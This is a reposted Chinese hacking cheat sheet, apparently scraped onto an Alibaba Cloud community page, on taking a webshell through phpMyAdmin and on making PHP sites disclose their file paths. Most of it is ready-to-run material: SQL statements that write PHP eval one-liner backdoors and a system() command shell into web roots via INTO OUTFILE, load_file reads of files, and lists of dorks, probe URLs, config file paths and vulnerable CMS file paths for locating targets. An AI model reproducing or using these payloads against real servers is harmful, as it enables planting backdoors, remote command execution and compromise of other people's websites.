phpMyAdmin後台拿Shell方法及php爆路徑方法

來源:互聯網
上載者:User
轉自:http://kuxoo.com/phpMyAdmin/
[PhpMyAdmin後台拿Shell]
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma INTO OUTFILE 'E:/wamp/www/7.php';
以上同時執行,在資料庫: mysql 下建立一個表名為:xiaoma,欄位為xiaoma1,匯出到E:/wamp/www/7.php 一句話串連密碼:xiaoma

Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;

create database wutongyu(這個為資料庫名稱).
use wutongyu (串連資料庫)
create table shell(code text) (建立表shell,欄位code為文本型資料)
insert into shell(code) values ('<?php @eval($_POST['c']);?>'); (插入一句話,密碼為C)
select * from shell into outfile "D:\\detai\\AppServ\\www\\phpMyAdmin2\\shell.php" (匯出shell到絕對路徑)

PhpMyAdmin匯出WebShell至中文路徑
set character_set_client='gbk';
set character_set_connection='gbk';
set character_set_database='gbk';
set character_set_results='gbk';
set character_set_server='gbk';
select '<?php eval($_POST[cmd]);?>' into outfile 'd:\www\網站\mm.php';

讀取檔案內容:select load_file('E:/xamp/www/s.php');
寫一句話:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
cmd執行許可權: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

select load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然後訪問網站目錄:http://www.xxxx.com/xiaoma.php?cmd=dir
 
[PHP爆路徑方法]
1、單引號爆路徑
說明:直接在URL後面加單引號,要求單引號沒有被過濾(gpc=off)且伺服器預設返回錯誤資訊。
www.xxx.com/news.php?id=149′
2、錯誤參數值爆路徑
說明:將要提交的參數值改成錯誤值,比如-1。-99999單引號被過濾時不妨試試。
www.xxx.com/researcharchive.php?id=-1
3、Google爆路徑
說明:結合關鍵字和site文法搜尋出錯頁面的網頁快照,常見關鍵字有warning和fatal error。注意,如果目標網站是次層網域,site接的是其對應的頂級網域名稱,這樣得到的資訊要多得多。
Site:xxx.edu.tw warning
Site:xxx.com.tw “fatal error”
4、測試檔案爆路徑
說明:很多網站的根目錄下都存在測試檔案,指令碼代碼通常都是phpinfo()。
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php
5、PhpMyAdmin爆路徑
說明:一旦找到phpmyadmin的管理頁面,再訪問該目錄下的某些特定檔案,就很有可能爆出實體路徑。至於phpmyadmin的地址可以用wwwscan這類的工具去掃,也可以選擇google。
1. /phpmyadmin/libraries/lect_lang.lib.php
2./phpMyAdmin/index.php?lang[]=1
3. /phpMyAdmin/phpinfo.php
4. load_file()
5./phpmyadmin/themes/darkblue_orange/layout.inc.php
6./phpmyadmin/libraries/select_lang.lib.php
7./phpmyadmin/libraries/lect_lang.lib.php
8./phpmyadmin/libraries/mcrypt.lib.php
6、設定檔找路徑
說明:如果注入點有檔案讀取許可權,就可以手工load_file或工具讀取設定檔,再從中尋找路徑資訊(一般在檔案末尾)。各平台下Web伺服器和PHP的設定檔預設路徑可以上網查,這裡列舉常見的幾個。
Windows:
c:\windows\php.ini                                    php設定檔
c:\windows\system32\inetsrv\MetaBase.xml  IIS虛擬機器主機設定檔
Linux:
/etc/php.ini                                     php設定檔
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf              Apache設定檔
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf         虛擬目錄設定檔
7、nginx檔案類型錯誤解析爆路徑
說明:這是昨天無意中發現的方法,當然要求Web伺服器是nginx,且存在檔案類型解析漏洞。有時在圖片地址後加/x.php,該圖片不但會被當作php檔案執行,還有可能爆出實體路徑。
www.xxx.com/top.jpg/x.php
8、Other PHP
DeDeCms
/member/templets/menulit.php
plus/paycenter/alipay/return_url.php
plus/paycenter/cbpayment/autoreceive.php
paycenter/nps/config_pay_nps.php
plus/task/dede-maketimehtml.php
plus/task/dede-optimize-table.php
plus/task/dede-upcache.php
WordPress
wp-admin/includes/file.php
wp-content/themes/baiaogu-seo/footer.php
Ecshop商城系統暴路徑漏洞檔案
/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.